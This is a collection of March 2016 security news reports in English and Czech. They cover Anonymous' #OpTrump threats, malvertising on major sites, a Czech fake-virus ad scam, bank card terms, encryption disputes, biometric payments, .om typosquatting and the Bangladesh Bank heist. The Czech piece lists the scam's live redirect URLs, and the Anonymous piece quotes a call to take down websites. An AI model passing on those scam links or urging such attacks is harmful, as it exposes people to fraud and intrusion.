Dear Donald Trump Anonymous plans to destroy your campaign starting April 1
16.3.2016 Hacking

Anonymous has declared war on Donald Trump, the hacking collective will start a new powerful campaign starting April 1.
The hacktivists have already expressed their disappointment on the presidential candidate’s controversial campaign rhetoric that resulted in a series of a series of attacks.
The attack against Trump started in 2015 when Anonymous defaced the website Trump.com with a tribute to Jon Stewart.

“Mr Stewart, we at @TelecomixCanada would like to take this opportunity to thank you for the many happy years of quality journalism and entertainment you and your team have undertaken at Comedy Central,” reads a letter on Trump’s site.

In December, the reprisal became more intense following the Donald Trump’s call for a sweeping ban on Muslims entering the United States soil. Trump’s declaration raised the protest around the world from politicians, hacktivists, to ordinary citizens.

anonymous Donald Trump 2
Anonymous has joint in the protest, declaring war against the presidential candidate, the hackers published a video message announced their operation against the campaign of the US billionaire.

“Donald Trump, it has come to our attention that you want to ban all Muslims to enter the United States. This policy is going to have a huge impact. This is what ISIS wants. The more Muslims feel sad, the more ISIS feels that they can recruit them. Donald Trump, think twice before you speak anything. You have been warned, Donald Trump.” states the Video Message.
The group officially launched the #OpTrump hacking campaign against Donald Trump, a DDoS attack hit the website for New York City’s Trump Towers and the website remained offline for hours.

Now Anonymous has announced a new initiative against Donald Trump and his campaign, the collective plans to coordinate a series of attacks on its websites starting April 1.

The group announced its re-engagement of “OpTrump” in a video message, the collective wants to synchronize the efforts of the numerous collectives against Donald Trump and his electioneering organization.

The Anonymous spokesman in the video motivated the planned attacks as a response to the Donald Trump’s “appalling actions and ideas” in conducting the presidential campaign.

“We have been watching you for a long time and what we’ve seen is deeply disturbing. You don’t stand for anything but your personal greed and power.”

“This is a call to arms. Shut down his websites, research and expose what he doesn’t want the public to know. We need you to dismantle his campaign and sabotage his brand.”“We need to dismantle his campaign and sabotage his brand,” said Athe nonymous spokesman.

“We need to dismantle his campaign and sabotage his brand,” said Athe nonymous spokesman.
Of course, Trump is aware that is a target and hired experts to protect his campaign.

We have to consider that today Internet is the privileged instrument of politicians and any kind of interference with online activities of the candidates could have unpredictable effects on the final voters’ decision.

A couple of weeks ago, alleged members of the Anonymous group hacked the Donald Trump ‘s voicemails. Journalist at Gawker received an email by the hackers containing recordings from Donald Trump ‘s voicemail inbox.

Let’s see what will happen.


Several Top websites as BBC, New York Times AOL, MSN and others victims of malvertising
16.3.2016 Virus

Security experts from various firms have discovered a malvertising campaign that has been placing malicious ads on very popular websites like BBC and NYT.
As the title says, a number of popular websites, including The New York Times, BBC, The Hill, Newsweek, AOL, MSN, and several others, were victims of a malvertising campaign.

The attack hijacked the ad network from each of these websites, crooks used the Angler Exploit Kit to deliver Ransomware to the people visiting these websites.

Investigations conducted by experts at Trustwave, Trend Micro, and Malwarebytes reported a spike in malicious traffic over the weekend.

There is no clue if this was part of a larger coordinated effort, but the conclusion is that whoever did this, knew exactly what they were doing.

“We have just discovered an advertising campaign that has been placing malicious advertisements on very popular websites both in the US and internationally. “answers.com” (Alexa rank 420 Global and 155 in the US), “zerohedge.com” (Ranked 986 in the US) and “infolinks.com” (Ranked 4,649 Internationally) are only some of the big names that were recently found redirecting visitors to the Angler exploit kit through a malicious advertising campaign, and though malicious advertising has become part of our daily lives in the world of web security, this story is a little different.” states a blog post published by Trustwave.

“These days we’re practically used to the “standard” Malvertising campaigns where the placement of malicious advertisements on known ad provider networks leads potential victims to an exploit kits’ landing page.” Continues the post.

According to the experts at Trustwave, an experienced actor exploited an expired domain of a small but probably legitimate advertising company to launch the attack.

“This provides them with high quality traffic from popular web sites that publish their ads directly, or as affiliates of other ad networks, which our research has shown to lead to the Angler EK.” continues the post

Trend Micro reported that the attacks based on the Agler exploit kit increased in a significant way since March 9.
malvertising campaign March 2016

The innovation, in this case, was that crooks used recently expired domain as part of their campaign. By acquiring a recently expired domain, the threat actors are able to bypass some checks because the traffic appears as legit.

Malwarebytes connected the registration of two rogue domains to the attacks relaying on the Angler Exploit kit that hit during the week the visitors of the New York Times, MSN, BBC, AOL, The Hill, Newsweek, NFL.com, the Xfinity customer portal (my.xfinity.com), Realtor.com, and The Weather Channel.

They also explain very well, in an image what happens, when a user accesses one of this targeted websites, in this case assuming that DailyMail.com ads were compromised:

malvertising campaign March 2016 attack scheme

Crooks have chosen Ransomware to infect the victims because it offers a fast way to cash out the efforts.

As more and more variants of Ransomware appear, and since there are no costs once they pay the initial fee, we will keep see a rise in Ransomware during this year.

Please if you want to get more details feel free to access Malwarebytes page, TrendMicro, and Trustwave.


Podvodné reklamy straší virovou nákazou, šíří je i reklamní síť Googlu

16.3.2016 Viry

Přes některé české i zahraniční reklamní systémy se v těchto dnech šíří malvertising, který se snaží uživatele vyděsit tím, že mají napadený smartphone.
9:02 – doplněno vyjádření firmy R2B2

„Zjistili jsme, že jste nedávno navštívili pornografické stránky. 28,1% z mobilních dat je obtížné infikován škodlivými viry 4. Viry mohou poškodit SIM kartu ! Vaše soukromá data vyprší! Fotografie a kontakty jsou ztraceny!“

Lámaná čeština, hrozba, že „vaše soukromá data vyprší“, pokud nic neuděláte, a odkaz vedoucí až k webu, který po vás bude chtít telefonní číslo. Na české mobilní uživatele v uplynulých dnech zamířila vlna falešných reklam, které se šíří prostřednictvím mobilních reklamních systémů. Podobný případ ale hlásí i velké zahraniční weby.

Na aktuální malvertising nás na Facebooku upozornil Pedro Palcelloni. Falešná varování před virovou nákazou v jeho telefonu se mu zobrazila při čtení článků na iDNES.cz.

Podle projektového manažera iDNES.cz Pavla Kočičky vydavatelství o problému ví a od začátku jej řeší. Upozornění se podle něj šířila prostřednictvím falešných reklamních formátů v mobilních programatických systémech, které vydavatelství Mafra na svých webech využívá. Jedním z provozovatelů, které Mafra využívá, je podle něj Google, dalším česká síť R2B2.

„Sestřelili jsme reklamu i všechny ostatní, které vedou na doménu .click a zakázali jsme reklamy z kategorie ‚security‘. Google o tom ví od předvčerejška, že jim tam takový hnus protéká, pravidelně jim to hlásíme,“ popsal v komentáři na Facebooku.

„Podvodné reklamy jsou bohužel fenomén současných automatizovaných sítí pro prodej online reklamy. Forma s automatickým přesměrováním na telefonech s operačním systémem Android je dosud její nejagresivnější podobou. Jako vydavatel hlídáme využívání svého reklamního prostoru a podvodné nebo podezřelé reklamy ihned blokujeme. Problém zároveň řešíme v úzkém spojení s poskytovateli reklamního obsahu, kteří na potírání těchto online fraudů dedikovali celé týmy i výpočetní farmy,“ reaguje také Jan Malý, projektový manažer, který má mobilní weby v iDNES.cz na starost.

O reakci jsme požádali jak český Google, tak R2B2, ale zatím jsme od nich nedostali žádné upřesňující informace.

Doplnění 9:02 – Odpověď z R2B2 dorazila těsně po publikování tohoto textu:

„Z našich reklamních kanálu tyto zavirované reklamy nešly, nicméně z profesionálních důvodů jsme se snažili vypátrat, odkud se vir na weby Mafry dostal a dle našich zjištění šel z reklamních jednotek společnosti Google, které Mafra nasazuje na své stránky mimo naši spolupráci,“ napsal Lupě jednatel R2B2 Martin Čelikovský.

Reklama podle něj byla na první pohled podezřelá. „Už proto, že byla podivně cílená (angličtina, dovolená) a byla nasazena s omezením frekvence 1× na uživatele s velmi vysokou nabídkou v aukci. Necílenou reklamu tohoto typu se pouštět takto nemůže vyplácet, což upřelo naši pozornost na tuto reklamu a podezření jsme vzápětí potvrdili,“ dodává.

Autor: R2B2
„Na celé skutečnosti je podivné, že reklama prošla kontrolou společnosti Google. Ale jelikož to nebyl kanál v rámci spolupráce s naší společností, tak nejsme obeznámeni s podrobnostmi,“ doplňuje Čelikovský.

Jak útok funguje

Na falešná varování se samozřejmě nevyplatí klikat. Podvržené reklamy na mobilních telefonech používají taktiku falešných antivirů, která dlouhé roky „úspěšně“ funguje na počítačích. Nic netušící uživatelé se nechají snadno nachytat a v panice věří, že se jim v počítači objevil virus. A ve skutečnosti ho tam ochotně pustí.

Na počítači podobné věci mívají fatální následky – pokud máte děravý Flash nebo Javu, nebo jinou neošetřenou zranitelnost. Na iOSu či Androidu hrozí poměrně málo, tedy pokud si případné následné svinstvo nepustíte dobrovolně do systému. Ale jak uvidíme níže, ne vždy je cílem těchto aktivit dostat do mobilu či počítače malware.

Ze screenshotu to sice není vidět, ale adresa je například paly.google.com.store.apps.
deepmind.click/
3b5MBivfkif2mmhxluoImYurMuwz/cz/ a tlačítko pro „odstranění“ viru vede na cldlr.com/?a=33580&c=92366&s1=3Bcz, kde najdete pár dalších přesměrování (varm.coolsafeads.com/?kw=-1&s1= a poté 4ugzz.sexy.0367.pics se stažením REI495slmCZ.html z téže domény. A přesměrováním zdaleka není konec, dostanete se nakonec na reimageplus.com a v celém tom řetězci je otázka, kolik z těch webů je zneužitých/hacknutých. Pokud budete výše uvedené odkazy zkoumat, zjistíte, že jde navíc jenom o jednu z možných cest.

Konečná destinace každopádně je kdesi na z.dicemob.mobi (patří Zamano.com, poskytovateli mobilních/platebních služeb) a stránka tam po vás bude chtít telefonní číslo.

Pokud ho důvěřivě sdělíte, naletíte na aktuálně nejčastější způsob podvádění – posílání zpoplatněných SMS. Když se podíváte do patičky, zjistíte, že se web tváří, jako by probíhal přes vcelku jasně identifikovatelnou službu působící v Česku.

Cena za jednu SMS je 99 Kč a týdně jich dostanete až deset. Než si tedy uvědomíte, co se stalo, můžete přijít o hezkých pár set korun.

Po vyplnění telefonního čísla vám přijde SMS (případné „Klikněte zde“ otevírá odeslání SMS) a pokud na ni odpovíte, budou vám chodit další a další, které už budou zpoplatněné. Prostě si podvodem objednáte službu, která s viry a bezpečností vašeho telefonu nemá nic společného.

Zasaženy i New York Times

Podle aktuálních zpráv to vypadá, že současná kampaň není jen problémem České republiky. Podle bezpečnostní firmy Malwarebytes obdobné falešné reklamy ohrožují také uživatele velkých zahraničních webů jako je nytimes.co, bbc.com, nfl.com nebo newsweek.com.

I tady jde o podvodné reklamy šířené několika reklamními sítěmi – mezi jejich provozovatele patří Google, AppNexus, AOL či Rubicon. Podvržené reklamy se uživatelům snaží do zařízení instalovat ransomware.

Podobné útoky nejsou ojedinělé – a v Další příklad malvertisingu: na Forbes.com byl v některých reklamách malware zjistíte, že se často týká i renomovaných titulů. Potenciální nebezpečnost reklam je často jedním z argumentů, proč je na internetu blokovat.


Bez antiviru a firewallu platební kartu na internetu používat nesmíte

16.3.2016 Bezpečnost

Četli jste podmínky používání vaší platební karty? Možná budete překvapeni, co všechno podle nich musíte nebo nesmíte dělat při platbách na internetu.
Vlastně to vypadá jako docela dobrá absurdita – kdyby ovšem nešlo o tak důležitý dokument, jako jsou obchodní podmínky pro používání platebních karet. Svá pravidla nedávno aktualizovala tuzemská Fio banka (pro nové smlouvy platí od 8. března, pro dříve uzavřené začnou platit od 9. května). A když se do desetistránkového materiálu začtete, nestačíte se divit, co všechno musíte udělat, abyste jejím podmínkám vyhověli.

Podivil se i bezpečnostní expert Michal Špaček, který jinak obvykle volá po tom, aby se lidé na internetu chovali bezpečněji. „Dozvěděl jsem se například to, že když na počítači nemám antivir, tak ty obchodní podmínky porušuju. A taky bych je porušoval, kdybych nesledoval informace o virech a spyware. Ale to trochu sleduju, takže cajk. Jenže kvůli tomu občas navštěvuju i neznámé stránky, různé blogy nebo články, ostatně, takhle vlastně funguje tenhleten web, že. A tím už zase ty podmínky porušuju,“ upozornil na podmínky Fio banky na svém facebookovém profilu.

Kompletní podmínky najdete na webu banky (PDF) a novinkou v nich je zejména oddíl IVa, který si stojí za to přečíst. Začíná totiž výslovným upozorněním, že všechny v něm napsané věci jsou pro klienta povinné a musí se jimi řídit. Jenže pokud byste je vzali doslova, asi byste kartu spíš vrátili, protože se z jejího používání stává noční můra.

Firewall, antivir a anti-spyware

Některé povinnosti vypadají docela rozumně: klient třeba nesmí používat kartu na veřejně přístupných počítačích (třeba v internetových kavárnách). Jenže pak začne přituhovat: podle Fio banky má klient povinnost „legálně zabezpečit zařízení, prostřednictvím kterého se rozhodne používat platební kartu, firewallem, antivirovou a anti-spyware ochranou, a tyto ochranné prvky pravidelně aktualizovat.“ Ano, pokud nemáte na počítači, kde kartou platíte, firewall, antivir a antispyware, které pravidelně neaktualizujete, porušujete obchodní podmínky.

Ty ovšem porušujete i v případě, že na onom zařízení nemáte „legálně pořízený a pravidelně aktualizovaný operační systém“. Stačí tedy zmeškaná aktualizace a… porušujete podmínky. Máte také „povinnost pravidelně sledovat zprávy výrobce operačního systému o opravách chyb a nedostatků tohoto operačního systému a tyto opravy včas instalovat“.

Nainstalovali jste si někdy nějaký na internetu volně dostupný program? Pokud si nemůžete „…být s dostatečnou mírou jisti, že neobsahují viry nebo spyware“, porušujete podmínky. Smíte také „navštěvovat pouze známé, důvěryhodné a bezpečné stránky na internetu a neotvírat nevyžádané emaily, emaily od neznámých adresátů a emaily s podezřelým názvem nebo obsahem“. A v e-mailové schránce musíte používat spam filtr.

Povinnost mít nainstalovaný antivir, firewall a anti-spyware u Fio banky kupodivu platí i u „vyspělejších mobilních zařízení“ – tedy smartphonů a tabletů „s operačním systémem iOS, Android, Windows Phone a jiným operačním systémem“ (vypadá to, že někdo zkopíroval podmínku z části o PC, aniž by uvažoval o odlišnostech těchto zařízení). Stahovat aplikace z jiných než oficiálních obchodů je podle banky nežádoucí, ale i když se chováte žádoucím způsobem (tedy nestahujete mimo oficiální místa), Fio banka vás upozorní, že je to k ničemu, protože „klient nemůže spoléhat na kontrolu prováděnou provozovatelem operačního systému ve vztahu ke všem aplikacím.“

Zajímalo by mě také, jak si obyčejný laický uživatel poradí s následujícím odstavcem: „Klientovi se doporučuje, aby si před každým zadáním důvěryhodných údajů ověřil, že zařízení používá DNS překladače podporující DNSSEC, a prohlížeč si nastavil tak, aby sám prováděl DNSSEC ověřování.“ I když jde tady jen o doporučení, podle úvodního odstavce i tohle patří mezi povinnosti klienta. A pokud DNS nerozumí, ukládá mu Fio banka v následujícím odstavci další povinnost: doporučuje (tak je to povinnost, nebo doporučení?) „…obrátit se s požadavkem na zabezpečení zařízení a jeho případného komunikačního příslušenství na odborníka.“

Kdo zaplatí škodu

Abychom si dobře rozuměli: skoro všechna výše uvedená opatření skutečně mohou zvýšit vaše bezpečí na internetu, o tom není pochyb. A podle toho, co říká mluvčí Fio banky Zdeněk Kovář, je cílem podmínek přimět klienty chovat se obezřetně při používání platebních karet. „Domníváme se, že rozdělení odpovědnosti podle sféry vlivu je spravedlivé. Banka zajistí své systémy, servery, bankomaty atd. A klient zajistí svá zařízení. Jistě nelze od banky (a zejména od nízkonákladové banky) očekávat, že zajistí dostatečné zabezpečení všech počítačů, tabletů či mobilních telefonů, které klient využívá pro přístup do banky nebo k provádění internetových transakcí platební kartou. Toto musí zajistit sám klient. Proto naše obchodní podmínky obsahují specifikaci toho, co považujeme za dostatečné zabezpečení,“ argumentuje Kovář.

Problém je v tom, že tady nejde o tradiční bezpečnostní doporučení, jejichž dodržování záleží na klientovi. Fio banka všechna výše popsaná opatření dává klientovi jako povinnost a zahrnula je do závazných všeobecných obchodních podmínek. Kromě toho, že jde o materiál, který si málokdo přečte, takže jeho dopad na změnu chování uživatelů bude pravděpodobně limitně blízký nule, jde taky o součást smlouvy, a to, co je v něm napsané, nelze brát na lehkou váhu.

Podle sekce VII, odstavce 4, totiž „majitel účtu odpovídá za škodu způsobenou porušením svých povinností uvedených ve smlouvě nebo podmínkách, není-li stanoveno jinak.“ A v dalším odstavci se dozvíte, že „majitel účtu odpovídá za škodu z neautorizovaných platebních transakcí v plném rozsahu, pokud škodu způsobil svým podvodným jednáním nebo úmyslně či z hrubé nedbalosti porušil některou z jeho povinností vyplývající z čl. III, IV a V podmínek…“

Pokud tedy výše popisovaná opatření doslova nedodržujete a někdo vaši kartu zneužije, máte zaděláno na potenciální problém: banka se může snažit zbavit své odpovědnosti za ztrátu z neautorizovaných (čili podvodníky provedených) plateb. Není samozřejmě jisté, že by banka případný soudní spor s vámi vyhrála, ale vyloučené to také není.

Kontrola jednou denně

Podle zákona o platebním styku (284/2009 Sb.) nese klient v případě zneužití ztracené nebo ukradené karty na případné škodě spoluúčast do výše 150 eur (platí to pro všechny transakce do chvíle, než krádež nebo ztrátu karty bance oznámíte – proto je důležité podobné události nahlašovat co nejdříve).

Podle §116 odstavce 1 b) ale tento limit neplatí, pokud klient „…tuto ztrátu způsobil svým podvodným jednáním nebo tím, že úmyslně nebo z hrubé nedbalosti porušil některou ze svých povinností stanovených v § 101.“ A paragraf 101 říká, že uživatel má povinnost „používat platební prostředek v souladu s rámcovou smlouvou, zejména je povinen okamžitě poté, co obdrží platební prostředek, přijmout veškerá přiměřená opatření na ochranu jeho personalizovaných bezpečnostních prvků.“

Nové podmínky Fio banky se přitom v českém prostředí zdají být poměrně unikátní. Nezkoumali jsme všechny banky, ale v obchodních podmínkách asi desítky těch, které jsme prostudovali, na povinné používání antiviru apod. nenarazíte (Komerční banka jej doporučuje ve svém Průvodci k platebním kartám).

Doplnění 12:00: Jak nás upozornil jeden ze čtenářů, podobné požadavky na své klienty používající internetové bankovnictví ve všeobecných podmínkách klade i Equa bank (PDF).

Obvyklé jsou povinnosti chránit PIN a nikomu ho neříkat a „…zejména nepsat PIN na platební kartu, její obal nebo jiný předmět, který nosíte společně s platební kartou, chránit zadávání PIN před odpozorováním z okolí apod." (Česká spořitelna, PDF) nebo chránit kartu před krádeží a „před přímým působením magnetického pole, mechanickým a tepelným poškozením“ (ČSOB, PDF).

Banky také obvykle trvají na povinnosti, že uživatel musí pravidelně kontrolovat, že kartu pořád má a že ji nikdo nezneužil – podle Komerční banky (PDF) to má dělat „soustavně“, podle ČSOB nebo Fio banky to musí dělat minimálně jednou denně.

Jde o celou řadu požadavků, u kterých banka za normálních okolností nemá šanci ověřovat, že je skutečně děláte. „Kontrolu minimálně jednou denně považujeme za rozumný požadavek. Banka nekontroluje ani nevyžaduje, aby to držitel karty jakkoli prokazoval,“ uvádí na dotaz mluvčí Kovář. Nicméně opět ve spojení s tím, že případnou krádež karty musíte nahlásit bezodkladně, se tu rýsuje zajímavá možnost: co když na ni přijdete později a nahlásíte ji třeba až za dva dny? Banka to může považovat za porušení podmínek a tím pádem vám může zkusit upřít ochranný 150eurový limit.

Stejně tak podle něj Fio banka neověřuje, jestli její klienti dodržují zásady na ochranu svých počítačů a smartphonů. V případě, že dojde na krádež, zneužité nebo podvodné transakce, ale může být vše jinak. „Banka nemá možnost kontroly. Pokud ale fraud vyšetřuje Policie ČR, tak je možné, že v rámci vyšetřování počítač postiženého zkontroluje,“ dodává mluvčí.


After Apple, WhatsApp Under Fire from US Govt Over Encryption
15.3.2016 Apple
Before winding up the dispute of Apple and FBI over encryption, another buzz on the Whatsapp Snooping is now the hot debate on the court bench.
In the wake of WhatsApp's move to offer end-to-end encryption to text messages as well as VoIP calls made through its app, federal authorities have not been able to execute wiretapping warrants on WhatsApp users.
Though the US Department of Justice was discussing how to proceed with a continuing criminal investigation, the government is considering legal proceedings similar to those involved with Apple.
According to the New York Times, as recently as this past week, a federal judge had approved a wiretap in a criminal investigation, but WhatsApp's encryption hindered investigators.
Since any court officials have not made a final decision, the Department of Justice is very keen to drag Whatsapp into the Encryption fight war zone similar to the ongoing San Bernardino case.
In San Bernardino case, the DoJ was granted a court order to force Apple to create a special version of iOS that could defeat the encryption on a seized iPhone 5C belongs to one of the dead terrorists named Syed Rizwan Farook.
Apple has vowed both publicly as well as in court papers to fight the court order as intensely as possible, citing security concerns, but the battle between Apple and the FBI is not ending anytime soon.
Why was WhatsApp not Targeted Before?
When Whatsapp was launched in January 2010 by Brian Acton and Jan Koum, it did not initially concern about any privacy features. So there were no opinions to implement cryptographic services at that time.
This relieved the Department of Justice and federal agencies as they could see a clear pathway for snooping WhatsApp users without any legalities.
WhatsApp, now owned by Facebook, had also been criticized before for not adopting a reliable end-to-end communication that secures its user's privacy.
Whatsapp Filled the Security Holes in its Communication
Soon after the tremendous growth of Whatsapp, Facebook acquired the popular messaging service for $19 Billion in February 2014 and WhatsApp partnered with Open Whisper system and developed an end-to-end communication two years back.
This development thwarted DoJ officials and others federal authorities from eavesdropping WhatsApp users' communications for snooping purposes.
Currently, Whatsapp is not involved in any of the criminal cases prevailing in the court, except a Brazilian drug trafficking case, but still court officials debate to foresee the chance of this widely used app adoption by criminals shortly for coordinated attacks.
Obsolete Order Remains Ineffective
As noted by the Times, Wiretap order from the federal judges could not penetrate the end-to-end encrypted communication, as these were used as a valuable investigative tool in the olden time, when people used landline phones that were easy to tap.
Over the past year, WhatsApp has been upgrading encryption for its messages and VOIP calls. All WhatsApp messages sent between Android devices are end to end encrypted since past two years, and between iOS devices since last year.
This simply means that neither WhatsApp nor even its parent company Facebook can access their users' contents in plaintext, making it impossible for DoJ as well to read or eavesdrop, even with a court's wiretap order.
So, this is the time to scrap such orders from the United States Federal Laws.
However, the government has always seemed to enforce such laws on companies that provide privacy protections to its customers.
Recently, a Brazilian Facebook executive was arrested for the company's failure to comply with a federal court order to turn over WhatsApp data.
Apple is also fighting one such court order with the Federal Bureau of Investigation (FBI).
What if the FBI wins the Case?
If Apple is going to head node a "Yes" to the FBI officials, there will be no way out for the users to secure their privacy and the feds will force Apple to unlock more iPhones.
Moreover, if Apple turns to agree, the Federal officials would next dismantle the Whatsapp privacy by enforcing such laws.
As a result, again new apps would mushroom in the digital world which quotes "Security and Privacy" in their products and would again end up in the melodrama of Federal Officials.
Slowly, this would vanish the privacy of netizens and adversely affect the businesses, customers as well as the US government who rely on strong encryption to help protect their information from hackers, identity thieves and foreign cyber attacks.
Moreover federal officials do not realize the fact that their data would also be open for snooping, even if they issue any private "No-Trace" agreements with any agency.
So let's see if any privacy concern movement is being made against Whatsapp or any other tech giant that ensures its users security and privacy in near future.


Fujitsu targets payment industry with PalmSecure Technology
15.3.2016 Security

Fujitsu has announced plans to launch its digital payment system PalmSecure Technology in Europe that is a security solution for biometric identification
Fujitsu has announced plans to launch its digital payment system PalmSecure in Europe that is a security solution for biometric identification, which is offering the perfect user authentication for payment scenarios. It operates touchless, highly reliable, hygienic, and super-fast. The biometric authentication based on Palm vein recognition takes less than one second and can definitely enter the next level of payments soon.

PalmSecure Technology 1

Cash could well be a thing of the past in the not-so-distant future and it is becoming clearly obvious that the time, where Credit cards and pin codes have been used for payments has come to an that means more innovative and highly secure solutions are entering the banking technology. In the UK, 59% of consumers have made a purchase through a smart device, and 12% are more likely to make a purchase using their smartphone than they were 12 months ago. And with more and more people interested in mobile and digital payments, brands are racing to create ever-more secure ways to pay. As a case in point, MasterCard has created a secure way to pay that allows users to identify themselves using a selfie taken on their smartphone.

Fujitsu has announced plans to roll out its digital payment system PalmSecure in Europe that is a security solution for biometric identification, which is offering the perfect user authentication for payment scenarios. It operates touchless, hygienic, highly reliable and super-fast. The biometric authentication based on Palm vein recognition takes less than 1 second and can definitely enter the next level of payments soon.

PalmSecure Technology 2

The PalmSecure sensor captures more than five million reference points from someone’s palm-vein pattern to confirm their identity and allows them to pay for goods by just touching one of its sensors – no cash or credit cards needed here. The image capture and matching processes work without the need to touch the sensor’s surface, making it very hygienic. A person’s palm vein pattern remains the same throughout their life. Every palm-vein pattern is also unique. Individuals have different patterns in their left and their right hands, and even twins have different patterns. The palm vein device works by capturing a person’s vein pattern image while radiating it with near-infrared rays. The deoxidized haemoglobin in the palm vein absorbs these rays, thereby reducing the reflection rate and causing the veins to appear as a black pattern. This vein pattern is then verified against a pre-registered pattern to authenticate the individual.

In the graph below, Fujitsu compares some of the most common technologies by the criteria “accuracy” and “practicality”.

PalmSecure Technology 3

The following table ranks biometric methods on their False Acceptance Rate (FAR) and False Rejection Rate (FRR). These indicators define the security level of a biometric system (FAR) and the usability of a biometric system (FRR).

PalmSecure Technology 4

The way that people pay is changing; technology is advancing to a level that people might not have to carry credit cards ever again, let alone cash. Brands should be keeping abreast of these technological changes and consumers’ increasing interest in the quickest and easiest way for them to pay; after all the easier it is for people to buy, the more they will.


Crooks expoit Oman websites in typosquatting attacks
15.3.2016 Hacking

According to experts at EndPoint security firm, crooks are buying many .om domains to carry on typosquatting attacks.
Crooks are buying many .om domains to carry on typosquatting attacks. According to experts at EndPoint security firm, crooks are buying many .om domains with the purpose to fool clumsy users that mistype .om instead of .com .

Security researchers say that the .om domain from the country Oman are being exploited in typosquatting attacks and that more than 300 domains were bought and are using US company names, like Citibank, Dell, Macys and Gmail.

“Our research revealed that there is at least one major .om typosquatting campaign targeting many of the world’s largest organizations. It has already targeted over 300 well-known organizations, including Netflix, and given the spike in activity in February, is likely to only attempt to expand its reach in March.” states the blog post published by the security firm.

Mac OS X users are being targeted to be fooled by the typosquatting campaign and trick them to install malware, when they mistype a website and end up in a page where a fake Adobe Flash update pops up, and the user is tempted to install “flash” update, but in fact its installing the Genieo, an advertising component.

“[the victim] mistyped the domain “www.netflix.com” as “netflix.om” in his browser, accidentally dropping the “c” in “.com”. He did not get a DNS resolution error, which would have indicated the domain he typed doesn’t exist. Instead, due to the registration of “netflix.om” by a malicious actor, the domain resolved successfully.” continues the the post. “His browser was immediately redirected several times, and eventually landed on a “Flash Updater” page with all the usual annoying (and to an untrained user, terrifying) scareware pop-ups. “

Genieo is an adware / malware that usually poses as an Adobe Flash update, as a said previously, once the person clicks on it, it will drop an OS X DMG container. Once clicked on the DMG file, Genieo will install an extension in various supported browsers.

typosquatting attacks

In the case of a Windows, user who visits one of the websites used by typosquatters , they will be redirect to an ad network where they are inundate with ads, like surveys, free electronics, antivirus products, and so on, all leading the user to download and execute something.

“Destination web pages will almost assuredly be riddled with advertisements, surveys to complete for free electronics, or scareware tactics to entice users to download and execute an antivirus suite that leads to further headaches and intrusive advertising,” Dufresne from Endgame told to Threatpost:

“We haven’t seen this escalate beyond typosquatters pushing the well-known Genieo malware and ad networks,”

“But given the volumes of misdirected traffic to .om, this could be used as an effective tool to distribute much more serious threats,”

In the investigation conducted by Endgame, 334 .om sites were analyzed, and looking to the registration pattern, 15 different hosting providers were used and many of the websites are hosted in providers located in New Jersey.

“Very unsurprisingly, the software stack on these servers was uniform,” said Duffresne, and he also added that many of the servers behind the domains have unpatched vulnerabilities meaning that they could allow remote access:

“These hosts could easily be exploited by other actors to serve up alternate (possibly worse) malicious content than what’s currently being served,”

typosquatting

The problem is that .om domain is country code top-level domain, also called ccTLD, this means that ccTLDs are not related with an internet corporation for Assigned Names and Numbers and disputes need to be solved by using local laws of Omar.

I strongly suggest you pay attention when typing the URL of a specific website, unfortunately, a great number of .om websites are already used by crooks for illegal activities.

If you are interested of the entire list of suspicious domains give a look here.


Here's How Hackers Stole $80 Million from Bangladesh Bank
15.3.2016 Hacking
The recent cyber attack on Bangladesh's central bank that let hackers stole over $80 Million from the institutes' Federal Reserve bank account was reportedly caused due to the Malware installed on the Bank's computer systems.
Few days ago, reports emerged of a group of unknown hackers that broke into Bangladesh's central bank, obtained credentials needed for payment transfers from Federal Reserve Bank of New York and then transferred large sums to fraudulent accounts based in the Philippines and Sri Lanka.
The criminal group was able to steal a total value of about $81 Million from the Federal Reserve's Bangladesh account through a series of fraudulent transactions, but a typo in some transaction prevented a further $850 Million Heist.
However, the question was still there:
How the Hackers managed to transfer $80 Million without leaving any Trace?
Security researchers from FireEye's Mandiant forensics are helping the Dhaka investigators to investigate the cyber heist.
Investigators believe unknown hackers installed some type of malware in the Bangladesh central bank's computer systems few weeks before the heist and watched how to withdraw money from its United States account, Reuters reports.
Although the malware type has not been identified, the malicious software likely included spying programs that let the group learn how money was processed, sent and received.
The malware in question could be a potential Remote Access Trojan (RAT) or a similar form of spyware that gave attackers the ability to gain remote control of the bank's computer.
The investigators suspect the hack could have exploited a "zero-day" flaw as they are unknown to vendors as well.
After this, the hackers were able to steal the Bangladesh Bank's credentials for the SWIFT messaging system, a highly secure financial messaging system utilized by banks worldwide to communicate with each other.
"SWIFT and the Central Bank of Bangladesh are working together to resolve an internal operational issue at the central bank," Belgium-based SWIFT said in a statement Friday. "SWIFT's core messaging services were not impacted by the issue and continued to work as normal."
Security experts hope that the malware sample will be made available to the security researchers soon so that they can determine whether the sample was truly advanced, or if Bangladesh Central Bank's security protection was not robust enough to prevent the hack.
The Bangladesh Bank discovered weaknesses in its systems, which could take years to repair the issues though the Federal bank has denied any system compromise.


The DoJ threatens to force Apple to hand over iOS source code
15.3.2016 iOS

DOJ released a brief filing that threatens to force Apple to hand over the iOS source code if it will not help FBI in unlocKing the San Bernardino shooter’s iPhone.
The battle between Apple and the FBI is going on while the debate on the case is monopolizing the media. Last news in order of time is the warning issued by the Department of Justice (DoJ), the US authorities may force Apple for handing over the source code to the complete iOS operating system if it does not support the FBI unlock the San Bernardino shooter’s iPhone.

The position of Apple seems to be immovable, the CEO Tim Cook has declared that the company will refuse to help the FBI to protect its users. The idea to introduce a backdoor into its system is not feasible because could open the users to many other threat actors.

“The United States government has demanded that Apple take an unprecedented step which threatens the security of our customers. We oppose this order, which has implications far beyond the legal case at hand,” he wrote in a message to Apple customers..

“We feel we must speak up in the face of what we see as an overreach by the US government,” “Up to this point, we have done everything that is both within our power and within the law to help them. But now the US government has asked us for something we simply do not have, and something we consider too dangerous to create. They have asked us to build a backdoor to the iPhone,” he wrote.

“Specifically, the FBI wants us to make a new version of the iPhone operating system, circumventing several important security features, and install it on an iPhone recovered during the investigation.”

“The government is asking Apple to hack our own users and undermine decades of security advancements that protect our customers — including tens of millions of American citizens — from sophisticated hackers and cybercriminals,” he wrote.

“The same engineers who built strong encryption into the iPhone to protect our users would, ironically, be ordered to weaken those protections and make our users less safe. We can find no precedent for an American company being forced to expose its customers to a greater risk of attack.”

It response the-the DOJ released a 43-page brief filing that threatens to force Apple to hand over the iOS source code if the company will continue refusing to create a backdoored version of its iOS operating system.

FBI wants Apple IOS source code

The company could be forced by the FBI to hand over the iOS Source Code and the Electronic Signature iPhones that could allow the execution of modified software specifically designed by the FBI to bypass security measures implemented by the IT giant.

